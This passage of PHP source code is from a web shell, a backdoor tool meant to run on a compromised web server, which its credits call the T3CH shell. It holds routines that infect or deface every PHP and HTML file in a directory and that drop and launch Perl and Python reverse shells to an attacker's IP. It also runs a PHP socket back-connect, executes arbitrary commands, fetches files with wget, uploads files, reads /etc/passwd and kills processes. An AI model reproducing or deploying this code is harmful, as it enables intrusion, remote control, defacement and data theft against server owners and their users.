635. echo "Search results that contain 'admin' in directory names.<br>";
636. foreach(mass_files($rootdir, true) as $key => $filename) {
637. $basename = pathinfo($filename, PATHINFO_BASENAME);
638. if(preg_match('/admin/', $basename)) {
639. echo "<a href='?edit=$filename'>$filename</a><br>";
640. }
641. }
642. echo "<br>Search results that contain 'admin' in file names.<br>";
643. foreach(mass_files($rootdir, false) as $key => $filename) {
644. $basename = pathinfo($filename, PATHINFO_BASENAME);
645. if(preg_match('/admin/', $basename)) {
646. echo "<a href='?edit=$filename'>$filename</a><br>";
647. }
648. }
649. }
650.  
651. //Reverse IP
652. if(isset($_GET['reverseIP'])) {
653. echo "<center>
654. <form action='http://www.my-ip-neighbors.com/' method='post'>
655. <div id='container1'>
656. <div id='content1'>
657. Domain Name or IP Address:
658. </div>
659. </div>
660. <input type='text' size='50' name='domain' vlue='".$_SERVER['SERVER_ADDR']."' />
661. <input type='submit' name='submit' value='Search' />
662. </form>
663. </center>";
664. }
665.  
666. //Hash Generator
667. if(isset($_GET['hashGenerator'])) {
668. echo "<center>
669. <form action='' method='post'>
670. String to hash:<br>
671. <input type='text' name='string'>
672. <input type='submit' name='generate_hashes' value='Hash'>
673. </form>
674. </center>";
675. }
676. if(isset($_POST['generate_hashes'])) {
677. $string = $_POST['string'];
678. $md5 = md5($string);
679. $md52 = md5(md5($string));
680. $md53 = md5(md5(md5($string)));
681. $sha1 = sha1($string);
682. $sha12 = sha1(sha1($string));
683. $sha13 = sha1(sha1(sha1($string)));
684. $joomlasalt = salt_gen("4");
685. $joomlahash = md5($string.$joomlasalt);
686. $oscommsalt = salt_gen("2");
687. $oscommhash = md5($oscommsalt.$string);
688. $vbsalt = salt_gen("3");
689. $vbhash = md5(md5($string).$vbsalt);
690. $vbsalt2 = salt_gen("30");
691. $vbhash2 = md5(md5($string).$vbsalt2);
692. $mybbsalt = salt_gen("8");
693. $mybbhash = md5(md5($mybbsalt).md5($string));
694. $mybbsalt2 = salt_gen("8");
695. $mybbhash2 = md5(md5($mybbsalt2).$string);
696. $ipbsalt = salt_gen("5");
697. $ipbhash = md5(md5($ipbsalt).md5($string));
698. echo "<center>
699. <textarea cols='120' rows='25' readonly>";
700. echo 'md5($pass): '.$md5."\n";
701. echo 'md5(md5($pass)): '.$md52."\n";
702. echo 'md5(md5(md5($pass))): '.$md53."\n";
703. echo 'sha1($pass): '.$sha1."\n";
704. echo 'sha1(sha1($pass)): '.$sha12."\n";
705. echo 'sha1(sha1(sha1($pass))): '.$sha13."\n";
706. echo 'md5($pass.$salt) (Joomla): '.$joomlahash.':'.$joomlasalt."\n";
707. echo 'md5($salt.$pass) (osCommerce): '.$oscommhash.':'.$oscommsalt."\n";
708. echo 'md5(md5($pass).$salt) (vBulletin < 3.8.5): '.$vbhash.':'.$vbsalt."\n";
709. echo 'md5(md5($pass).$salt) (vBulletin >= 3.8.5): '.$vbhash2.':'.$vbsalt2."\n";
710. echo 'md5(md5($salt).$pass) (MyBB < 1.2): '.$mybbhash2.':'.$mybbsalt2."\n";
711. echo 'md5(md5($salt).md5($pass)) (MyBB 1.2+): '.$mybbhash.':'.$mybbsalt."\n";
712. echo 'md5(md5($salt).md5($pass)) (IPB 2+): '.$ipbhash.':'.$ipbsalt."\n";
713. echo "</textarea>
714. </center>";
715. }
716.  
717. //Extract Files
718. if(isset($_GET['extract'])) {
719. $file = $_GET['extract'];
720. $epath = $_GET['epath'];
721. $type = $_GET['type'];
722. extract_file($file, $epath, $type);
723. }
724.  
725. //Infect Files
726. if(isset($_POST['do_infect'])) {
727. $infdir = rtrim($_POST['infect_dir'], '/');
728. $type = $_POST['infect_type'];
729. $infcode = $_POST['infect_code'];
730. if(is_dir($infdir)) {
731. $success = 0;
732. $failed = 0;
733. foreach(mass_files($infdir, false) as $key => $files) {
734. $exten = pathinfo($files, PATHINFO_EXTENSION);
735. if($type == 'php') {
736. if($exten == 'php') {
737. $content = $infcode;
738. $content .= file_get_contents($files);
739. if(file_put_contents($files, $content)) {
740. echo "<font color='green'><b>Successfully infected file: $files</b></font></br>";
741. $success++;
742. } else {
743. echo "<font color='red'><b>Failed to infect file: $files</b></font></br>";
744. $failed++;
745. }
746. }
747. } elseif($type == 'html') {
748. if($exten == 'html') {
749. $content = $infcode;
750. $content .= file_get_contents($files);
751. if(file_put_contents($files, $content)) {
752. echo "<font color='green'><b>Successfully infected file: $files</b></font></br>";
753. $success++;
754. } else {
755. echo "<font color='red'><b>Failed to infect file: $files</b></font></br>";
756. $failed++;
757. }
758. }
759. } elseif($type == 'both') {
760. if($exten == 'html' or $exten == 'php') {
761. $content = $infcode;
762. $content .= file_get_contents($files);
763. if(file_put_contents($files, $content)) {
764. echo "<font color='green'><b>Successfully infected file: $files</b></font></br>";
765. $success++;
766. } else {
767. echo "<font color='red'><b>Failed to infect file: $files</b></font></br>";
768. $failed++;
769. }
770. }
771. }
772. }
773. echo "A total of $success files were infected!<br>A total of $failed files failed to be infected!";
774. } else {
775. error("$infdir is not a valid directory!");
776. }
777. }
778. if(isset($_GET['fileInfect'])) {
779. echo "<center>
780. This will append your infect code to the top of every file in the given directory.<br>
781. <form action='' method='post'>
782. Directory to infect: <input type='text' name='infect_dir' value='$rootdir'>
783. File types to infect:
784. <select name='infect_type'>
785. <option value='php'>PHP</option>
786. <option value='html'>HTML</option>
787. <option value='both'>Both</option>
788. </select><br>
789. Code to infect files with:<br>
790. <textarea name='infect_code' cols='110' rows='20'></textarea><br>
791. <input type='submit' name='do_infect' value='Infect'>
792. </form>
793. </center>";
794. }
795.  
796. //Deface Files
797. if(isset($_POST['do_deface'])) {
798. $defdir = rtrim($_POST['deface_dir'], '/');
799. $type = $_POST['deface_type'];
800. $defsource = $_POST['deface_source'];
801. if(is_dir($defdir)) {
802. $success = 0;
803. $failed = 0;
804. foreach(mass_files($defdir, false) as $key => $files) {
805. $exten = pathinfo($files, PATHINFO_EXTENSION);
806. if($type == 'php') {
807. if($exten == 'php') {
808. if($files != __FILE__) {
809. if(file_put_contents($files, $defsource)) {
810. echo "<font color='green'><b>Successfully defaced file: $files</b></font></br>";
811. $success++;
812. } else {
813. echo "<font color='red'><b>Failed to deface file: $files</b></font></br>";
814. $failed++;
815. }
816. }
817. }
818. } elseif($type == 'html') {
819. if($exten == 'html') {
820. if($files != __FILE__) {
821. if(file_put_contents($files, $defsource)) {
822. echo "<font color='green'><b>Successfully defaced file: $files</b></font></br>";
823. $success++;
824. } else {
825. echo "<font color='red'><b>Failed to deface file: $files</b></font></br>";
826. $failed++;
827. }
828. }
829. }
830. } elseif($type == 'both') {
831. if($exten == 'html' or $exten == 'php') {
832. if($files != __FILE__) {
833. if(file_put_contents($files, $defsource)) {
834. echo "<font color='green'><b>Successfully defaced file: $files</b></font></br>";
835. $success++;
836. } else {
837. echo "<font color='red'><b>Failed to deface file: $files</b></font></br>";
838. $failed++;
839. }
840. }
841. }
842. }
843. }
844. echo "A total of $success files were defaced!<br>A total of $failed files failed to be defaced!";
845. } else {
846. error("$defdir is not a valid directory!");
847. }
848. }
849. if(isset($_GET['fileDeface'])) {
850. echo "<center>
851. This will deface every file in the given directory. This will not deface this shell.<br>
852. <form action='' method='post'>
853. Directory to deface: <input type='text' name='deface_dir' value='$rootdir'>
854. File types to deface:
855. <select name='deface_type'>
856. <option value='php'>PHP</option>
857. <option value='html'>HTML</option>
858. <option value='both'>Both</option>
859. </select><br>
860. Source to deface files with:<br>
861. <textarea name='deface_source' cols='110' rows='20'></textarea><br>
862. <input type='submit' name='do_deface' value='Deface'>
863. </form>
864. </center>";
865. }
866.  
867. //Back Connect
868. if(isset($_POST['bcpl_connect'])) {
869. $ip = $_POST['bcpl_ip'];
870. $port = $_POST['bcpl_port'];
871. if(can_exe()) {
872. if(file_exists("/tmp/bc.pl")) {
873. echo "<center>
874. Trying to connect to $ip on port $port<br>
875. The response from 'perl /tmp/bc.pl $ip $port' was:<br>
876. <textarea cols='120' rows='25'>".exe_cmd("perl /tmp/bc.pl $ip $port")."</textarea>
877. </center>";
878. } else {
879. error("/tmp/bc.pl does not exist!");
880. }
881. } else {
882. error("Can not execute commands! A Perl script needs to be ran to spawn this reverse shell!");
883. }
884. }
885. if(isset($_GET['bcPerl'])) {
886. if(can_exe()) {
887. if(is_dir('/tmp')) {
888. if(file_put_contents('/tmp/bc.pl', base64_decode($bcpl))) {
889. success("Successfully wrote /tmp/bc.pl!");
890. echo "<center>
891. <form action='' method='post'>
892. IP: <input type='text' name='bcpl_ip' value='$yourip'>
893. Port: <input type='text' name='bcpl_port' value='2121' size='3'>
894. <input type='submit' name='bcpl_connect' value='Connect'><br>
895. Use: 'nc -l -v -p PORT' Remember your port must be forwarded!
896. </form>
897. </center>";
898. } else {
899. error("Failed to write Perl source to /tmp/bc.pl!");
900. }
901. } else {
902. error('/tmp is not a directory!');
903. }
904. } else {
905. error("Can not execute commands! A Perl script needs to be ran to spawn this reverse shell!");
906. }
907. }
908.  
909. if(isset($_POST['bcpy_connect'])) {
910. $ip = $_POST['bcpy_ip'];
911. $port = $_POST['bcpy_port'];
912. if(can_exe()) {
913. if(file_exists("/tmp/bc.py")) {
914. echo "<center>
915. Trying to connect to $ip on port $port<br>
916. The response from 'python /tmp/bc.py $ip $port' was:<br>
917. <textarea cols='120' rows='25'>".exe_cmd("python /tmp/bc.py $ip $port")."</textarea>
918. </center>";
919. } else {
920. error("/tmp/bc.py does not exist!");
921. }
922. } else {
923. error("Can not execute commands! A Python script needs to be ran to spawn this reverse shell!");
924. }
925. }
926. if(isset($_GET['bcPython'])) {
927. if(can_exe()) {
928. if(is_dir("/tmp")) {
929. if(file_put_contents('/tmp/bc.py', base64_decode($bcpy))) {
930. success("Successfully wrote /tmp/by.py");
931. echo "<center>
932. <form action='' method='post'>
933. IP: <input type='text' name='bcpy_ip' value='$yourip'>
934. Port: <input type='text' name='bcpy_port' value='2121' size='3'>
935. <input type='submit' name='bcpy_connect' value='Connect'><br>
936. Use 'nc -l -v -p PORT' Remember your port must be forwarded!
937. </form>
938. </center>";
939. } else {
940. error("Failed to write Python source to /tmp/by.py");
941. }
942. } else {
943. error("/tmp is not a directory!");
944. }
945. } else {
946. error("Can not execute commands! A Python script needs to be ran to spawn this reverse shell!");
947. }
948. }
949.  
950. if(isset($_POST['bcphp_connect'])) {
951. $ip = $_POST['bcphp_ip'];
952. $port = $_POST['bcphp_port'];
953. echo "<center>Trying to connect!</center>";
954. $sockopen = fsockopen($ip , $port , $errno, $errstr);
955. if(!$sockopen) {
956. error("Failed to open socket!");
957. } elseif($errno != 0) {
958. error("$errno: $errstr");
959. } else {
960. fputs($sockopen, "\n[+]PHP Back Connection[+]\n\n");
961. $uname = exe_cmd("uname -a");
962. $id = exe_cmd("id");
963. fputs($sockopen, "$uname$id\n");
964. while(!feof($sockopen)) {
965. fputs($sockopen, "> ");
966. $command = fgets($sockopen);
967. fputs($sockopen , exe_cmd($command));
968. }
969. fclose($sockopen);
970. }
971. }
972. if(isset($_GET['bcPHP'])) {
973. if(can_exe()) {
974. echo "<center>
975. <form action='' method='post'>
976. IP: <input type='text' name='bcphp_ip' value='$yourip'>
977. Port: <input type='text' name='bcphp_port' value='2121' size='3'>
978. <input type='submit' name='bcphp_connect' value='Connect'><br>
979. Use 'nc -l -v -p PORT' Remember your port must be forwarded!
980. </form>
981. </center>";
982. } else {
983. error("Can not execute commands! Commands need to be executed for this reverse shell to work!");
984. }
985. }
986.  
987. //System
988. if(isset($_GET['users'])) {
989. if(file_exists('/etc/passwd')) {
990. $getfile = file_get_contents('/etc/passwd');
991. $exline = explode("\n", $getfile);
992. echo "<table>
993. <tr>
994. <th>Username</th>
995. <th>Password?</th>
996. <th>UID</th>
997. <th>GID</th>
998. <th>UID Info</th>
999. <th>Home Directory</th>
1000. <th>Command/Shell</th>
1001. </tr>";
1002. foreach($exline as $exl) {
1003. echo "<tr>";
1004. $excol = explode(":", $exl);
1005. foreach($excol as $exc) {
1006. echo "<td>$exc</td>";
1007. }
1008. echo "</tr>";
1009. }
1010. echo "</table>";
1011. } else {
1012. error("/etc/passwd does not exist!");
1013. }
1014. }
1015.  
1016. if(isset($_GET['processes'])) {
1017. if(can_exe()) {
1018. $processes = exe_cmd("ps aux");
1019. $stripfirstline = substr($processes, strpos($processes, "\n")+1);
1020. $exline = explode("\n", $stripfirstline);
1021. echo "<div id='hover'>
1022. <table width='100%' border='1'>
1023. <tr>
1024. <th>Kill</th>
1025. <th>USER</th>
1026. <th>PID</th>
1027. <th>%CPU</th>
1028. <th>%MEM</th>
1029. <th>VSZ</th>
1030. <th>RSS</th>
1031. <th>TTY</th>
1032. <th>STAT</th>
1033. <th>START</th>
1034. <th>TIME</th>
1035. <th>COMMAND</th>
1036. </tr>";
1037. foreach($exline as $exl) {
1038. echo "<tr>";
1039. $exsp = array_values(array_filter(explode(" ", $exl), 'strlen'));
1040. if(count($exsp) > 11) {
1041. $slice = array_slice($exsp, 0, 10);
1042. echo "<td><a href='?killProccess=".$exsp[1]."'>Kill</a></td>";
1043. foreach($slice as $s) {
1044. echo "<td>$s</td>";
1045. }
1046. $slice2 = array_slice($exsp, 10);
1047. echo "<td>".implode(" ", $slice2)."</td>";
1048. } else {
1049. echo "<td><a href='?killProccess=".$exsp[1]."'>Kill</a></td>";
1050. foreach($exsp as $e) {
1051. echo "<td>$e</td>";
1052. }
1053. }
1054. echo "</tr>";
1055. }
1056. echo "</table></div>";
1057. } else {
1058. error("Can not execute commands! Must execute 'ps aux' to get processes.");
1059. }
1060. }
1061.  
1062. if(isset($_GET['memory'])) {
1063. if(file_exists('/proc/meminfo')) {
1064. $raminfo = file_get_contents('/proc/meminfo');
1065. echo "Ram:<br><pre>$raminfo</pre><br><br>";
1066. } else {
1067. error("/proc/meminfo does not exist!");
1068. }
1069. $hddfree = disk_free_space("/");
1070. $hddtotal = disk_total_space("/");
1071. $hddused = $hddtotal - $hddfree;
1072. $hddpercent = round(($hddused / $hddtotal) * 100);
1073. echo "HDD:<br>Total Space: ".ByteConversion($hddtotal)."<br>Free Space: ".ByteConversion($hddfree)."<br>Used Space: ".ByteConversion($hddused)."<br>Percent Used: ~$hddpercent%";
1074. }
1075.  
1076. if(isset($_GET['cpu'])) {
1077. if(file_exists('/proc/cpuinfo')) {
1078. $cpuinfo = file_get_contents('/proc/cpuinfo');
1079. echo "<center>
1080. CPU Information:<br>
1081. <textarea cols='120' rows='20'>$cpuinfo</textarea>
1082. </center>";
1083. } else {
1084. error('/proc/cpuinfo does not exist!');
1085. }
1086. }
1087.  
1088. //Execute Command
1089. if(isset($_POST['exe_cmd'])) {
1090. $command = $_POST['command'];
1091. if(can_exe()) {
1092. echo "<center>
1093. <form action='' method='post'>
1094. <input type='text' name='command' size='75'>
1095. <input type='submit' name='exe_cmd'>
1096. </form>
1097. The response from '$command' was:<br>
1098. <textarea cols='100' rows='20'>".exe_cmd($command)."</textarea>
1099. </center>";
1100. } else {
1101. error("Can not execute commands!");
1102. }
1103. }
1104.  
1105. //Create File
1106. if(isset($_POST['create_file'])) {
1107. $createpath = $_POST['create_file_path'];
1108. if(!file_exists($createpath)) {
1109. if(fopen($createpath, "w+")) {
1110. redirect("?edit=$createpath");
1111. } else {
1112. error("Failed to create file!");
1113. }
1114. } else {
1115. error("File already exists! You can view it <a href='?edit=$createpath'>here</a>.");
1116. }
1117. }
1118. //Create Directory
1119. if(isset($_POST['create_dir'])) {
1120. $dirpath = $_POST['create_dir_path'];
1121. if(!is_dir($dirpath)) {
1122. if(mkdir($dirpath, 0777)) {
1123. redirect("?dir=$dirpath");
1124. } else {
1125. error("Failed to make directory!");
1126. }
1127. } else {
1128. error("This directory already exists! You can view it <a href='?dir=$dirpath'>here</a>.");
1129. }
1130. }
1131.  
1132. //Wget File
1133. if(isset($_POST['do_wget'])) {
1134. $fileurl = $_POST['wget_file'];
1135. if(can_exe()) {
1136. echo "<center>
1137. The response from 'wget $fileurl' was:<br>
1138. <textarea cols='120' rows='20'>".exe_cmd("wget $fileurl")."</textarea>
1139. </center>";
1140. } else {
1141. error("Commands can not be executed!");
1142. }
1143. }
1144.  
1145. //Upload File
1146. if(isset($_POST['do_upload'])) {
1147. $uploaddir = $_POST['upload_dir'];
1148. $uploadname = $_FILES['upload_file']['name'];
1149. if(!file_exists("$uploaddir/$uploadname")) {
1150. if(move_uploaded_file($_FILES['upload_file']['tmp_name'], "$uploaddir/$uploadname")) {
1151. redirect("?dir=$uploaddir");
1152. } else {
1153. error("Failed to upload file!");
1154. }
1155. } else {
1156. error("File already exists! You can view it <a href='?edit=$uploaddir$uploadname'>here</a>.");
1157. }
1158. }
1159.  
1160. //Mass Files
1161. if(isset($_POST['mass_action'])) {
1162. $action = $_POST['action'];
1163. $checked = $_POST['massbox'];
1164. if($action == 'delete') {
1165. foreach($checked as $c) {
1166. if(is_dir($c)) {
1167. if(rmdir($c)) {
1168. echo "<font color='green'><b>Successfully deleted directory: $c</font><br>";
1169. } else {
1170. echo "<font color='red'><b>Failed to delete directory: $c</font><br>";
1171. }
1172. } else {
1173. if(unlink($c)) {
1174. echo "<font color='green'><b>Successfully deleted file: $c</font><br>";
1175. } else {
1176. echo "<font color='red'><b>Failed to delete file: $c</font><br>";
1177. }
1178. }
1179. }
1180. } elseif($action == 'chmod') {
1181. $chvalue = $_POST['chmod_value'];
1182. foreach($checked as $c) {
1183. if(chmod($c, $chvalue)) {
1184. echo "<font color='red'><b>Successfully chmod'd file: $c to: $chvalue</font><br>";
1185. } else {
1186. echo "<font color='red'><b>Failed to chmod file: $c to: $chvalue</font><br>";
1187. }
1188. }
1189. } else {
1190. error('Invalid action specified!');
1191. }
1192. }
1193.  
1194. //Display Disabled Functions
1195. if(isset($_GET['disabledFunctions'])) {
1196. echo "Disabled functions:<br>";
1197. $ex = explode(",", $disabledfunc);
1198. foreach($ex as $e) {
1199. echo "$e<br>";
1200. }
1201. }
1202.  
1203. //Kill Process
1204. if(isset($_GET['killProcess'])) {
1205. $id = $_GET['killProcess'];
1206. if(posix_kill($id)) {
1207. success("Successfully killed process: $id");
1208. } else {
1209. error("Failed to kill process: $id");
1210. }
1211. }
1212.  
1213. //Check Links
1214. if(isset($_GET['checkLinks'])) {
1215. echo "<table border='1'>
1216. <tr>
1217. <th>Link</th>
1218. <th>Status</th>
1219. <th>MD5</th>
1220. <th>Description</td>
1221. </tr>";
1222. foreach($links as $key => $ar) {
1223. $link = $ar['LINK'];
1224. $md5 = $ar['MD5'];
1225. $desc = $ar['DESC'];
1226. $headers = @get_headers($link);
1227. echo "<tr>";
1228. echo "<td><a href='$link'>$link</a></td>";
1229. if($headers[0] != "HTTP/1.1 403 FORBIDDEN" or $headers[0] != "HTTP/1.1 404 Not Found") {
1230. echo "<td><font color='green'><b>OK</b></font></td>";
1231. } else {
1232. echo "<td><font color='red'><b>Not Found</b></font></td>";
1233. }
1234. if(md5_file($link) == $md5) {
1235. echo "<td><font color='green'><b>Match</b></font></td>";
1236. } else {
1237. echo "<td><font color='red'><b>No Match</b></font></td>";
1238. }
1239. echo "<td>$desc</td>";
1240. echo "</tr>";
1241. }
1242. echo "</table>";
1243. }
1244.  
1245. //Credits
1246. if(isset($_GET['credits'])) {
1247. echo "<center>
1248. <div id='container'>
1249. <div id='content'>
1250. <font size='6'><b>$version Shell</font></b><br>
1251. Developed By: T3CH (@t3chfl4r3 or t3chfl4r3@gmail)<br>
1252. Nav Bar: Bootstrap (<a href='http://getbootstrap.com/'>http://getbootstrap.com/</a>)<br>
1253. Perl Reverse Shell: pentestmonkey@pentestmonkey.net<br>
1254. Python Reverse Shell: Xavier Garcia (<a href='http://www.shellguardians.com'>http://www.shellguardians.com</a>)
1255. </div>
1256. </div>
1257. </center>";
1258. }
1259.  
1260. //Kill
1261. if(isset($_GET['kill'])) {
1262. if(unlink(__FILE__)) {
1263. success("Successfully killed shell!");
1264. } else {
1265. error("Failed to kill shell!");
1266. }
1267. }
1268.  
1269. //Get Files & Directories from Current Directory
1270. $open = opendir($dir);
1271. $files = array();
1272. $direcs = array();
1273. while ($file = readdir($open)) {
1274. if ($file != "." && $file != "..") {
1275. if (is_dir("$dir/$file")) {
1276. array_push($direcs, $file);
1277. } else {
1278. array_push($files, $file);
1279. }
1280. }
1281. }
1282. asort($direcs);
1283. asort($files);
1284.  
1285. //Display Files and Directories
1286. echo <<<html
1287. <br><br>
1288. <table width='100%' border='1'>
1289. <tr>
1290. <th>Current Directory:
1291. html;
1292. $ex = explode("/", $dir);
1293. for ($p = 0; $p < count($ex); $p++) {
1294. @$linkpath.=$ex[$p] . '/';
1295. $linkpath2 = rtrim($linkpath, "/");
1296. echo "<a href='?dir=$linkpath2'>$ex[$p]</a>/";
1297. }
1298. echo <<<html
1299. </th>
1300. </tr>
1301. </table>
1302.  
1303. <form action='' method='post'>
1304. <div id="hover">
1305. <table width='100%' border='1'>
1306. <tr>
1307. <th>File/Dir Name</th>
1308. <th>Permissions</th>
1309. <th>Writeable</th>
1310. <th>Owner/Group</th>
1311. <th>Size</th>
1312. <th>Last Modified</th>
1313. <th>Delete</th>
1314. <th>Rename</th>
1315. <th>Mass</th>
1316. </tr>
1317. html;
1318. //Display Directories
1319. foreach($direcs as $dirs) {
1320. $perms = substr(base_convert(fileperms("$dir/$dirs"), 10, 8), 2);
1321. $writeable = is_writeable("$dir/$dirs") ? "<font color='green'><b>Writeable</b></font>" : "<font color='red'><b>Not Writeable</b></font>";
1322. $owner = fileowner("$dir/$dirs");
1323. $group = filegroup("$dir/$dirs");
1324. $size = "Directory";
1325. $lastmod = date("F d Y g:i:s", filemtime("$dir/$dirs"));
1326. echo <<<html
1327. <tr>
1328. <td><a href='?dir=$dir/$dirs'>$dirs</a></td>
1329. <td style="text-align: center;">$perms</td>
1330. <td style="text-align: center;">$writeable</td>
1331. <td style="text-align: center;">$owner/$group</td>
1332. <td>$size</td>
1333. <td>$lastmod</td>
1334. <td><a href='?delD=$dir/$dirs'>Delete</a></td>
1335. <td><a href='?rename=$dirs&rdir=$dir'>Rename</a></td>
1336. <td><input type='checkbox' name='massbox[]' value='$dir/$dirs'></td>
1337. </tr>
1338. html;
1339. }
1340.  
1341. //Display Files
1342. foreach($files as $file) {
1343. $perms = substr(base_convert(fileperms("$dir/$file"), 10, 8), 2);
1344. $writeable = is_writeable("$dir/$file") ? "<font color='green'><b>Writeable</b></font>" : "<font color='red'><b>Not Writeable</b></font>";
1345. $owner = fileowner("$dir/$file");
1346. $group = filegroup("$dir/$file");
1347. $size = ByteConversion(filesize("$dir/$file"));
1348. $lastmod = date("F d Y g:i:s", filemtime("$dir/$file"));
1349. $extension = pathinfo("$dir/$file", PATHINFO_EXTENSION);
1350. echo "<tr>";
1351. if(in_array($extension, $compression)) {
1352. echo "<td><a href='?extract=$dir/$file&epath=$dir&type=$extension'>$file</a></td>";
1353. } else {
1354. echo "<td><a href='?edit=$dir/$file'>$file</a></td>";
1355. }
1356. echo <<<html
1357. <td style="text-align: center;">$perms</td>
1358. <td style="text-align: center;">$writeable</td>
1359. <td style="text-align: center;">$owner/$group</td>
1360. <td>$size</td>
1361. <td>$lastmod</td>
1362. <td><a href='?delF=$dir/$file'>Delete</a></td>
1363. <td><a href='?rename=$file&rdir=$dir'>Rename</a></td>
1364. <td><input type='checkbox' name='massbox[]' value='$dir/$file'></td>
1365. </tr>
1366. html;
1367. }
1368. echo <<<html
1369. </table>
1370. </div>
1371. <div style='position:absolute; right:0%;'>
1372. <select name='action'>
1373. <option value='delete'>Delete</option>
1374. <option value='chmod'>chmod</option>
1375. </select>
1376. <input type='text' name='chmod_value' class='text' value='077' size='9'>
1377. <input type='submit' name='mass_action' value='Do Action'>
1378. </div>
1379. </form>
1380. <br>
1381. <br>
1382. <br>
1383. html;
1384.  
1385. if(is_writeable($dir)) {
1386. $writeable = "<font color='green'><b>[ Writeable ]</b></font>";
1387. } else {
1388. $writeable = "<font color='red'><b>[ Not Writeable ]</b></font>";
1389. }
1390. echo "<table width='100%' border='1'>
1391. <tr>
1392. <td>
1393. <center>
1394. <form action='' method='post'>
1395. Create File:<br>
1396. <input type='text' name='create_file_path' size='55' value='$dir/newfile.php'>
1397. <input type='submit' name='create_file' value='Create'><br>
1398. $writeable
1399. </form>
1400. </center>
1401. </td>
1402. <td>
1403. <center>
1404. <form action='' method='post'>
1405. Create Directory:<br>
1406. <input type='text' name='create_dir_path' size='55' value='$dir/newdir'>
1407. <input type='submit' name='create_dir' value='Create'><br>
1408. $writeable
1409. </form>
1410. </center>
1411. </td>
1412. </tr>
1413. <tr>
1414. <td>
1415. <center>
1416. <form action='' method='get'>
1417. Edit File:<br>
1418. <input type='text' name='edit' size='55' value='$dir/index.php'>
1419. <input type='submit' value='Edit'>
1420. </form>
1421. </center>
1422. </td>
1423. <td>
1424. <center>
1425. <form action='' method='get'>
1426. Go To Directory:<br>
1427. <input type='text' name='dir' size='55' value='/tmp'>
1428. <input type='submit' value='Go'>
1429. </form>
1430. </center>
1431. </td>
1432. </tr>
1433. <tr>
1434. <td>
1435. <center>
1436. <form action='' method='post' enctype='multipart/form-data'>
1437. Upload To Directory:<br>
1438. <input type='text' name='upload_dir' size='55' value='$dir'><br>
1439. <input type='file' name='upload_file'>
1440. <input type='submit' name='do_upload' value='Upload'><br>
1441. $writeable
1442. </form>
1443. </center>
1444. </td>
1445. <td>
1446. <center>
1447. <form action='' method='post'>
1448. wget file:<br>
1449. <input type='text' name='wget_file' size='55' value='http://'>
1450. <input type='submit' name='do_wget' value='wget'>
1451. </form>
1452. </center>
1453. </td>
1454. </tr>
1455. <tr>
1456. <td colspan='2'>
1457. <center>
1458. <form action='' method='post'>
1459. Execute Command:<br>
1460. <input type='text' name='command' size='65'>
1461. <input type='submit' name='exe_cmd' value='Execute'>
1462. </form>
1463. </center>
1464. </td>
1465. </tr>
1466. </table>
1467. <br>
1468. <br>";
1469.  
1470. ?>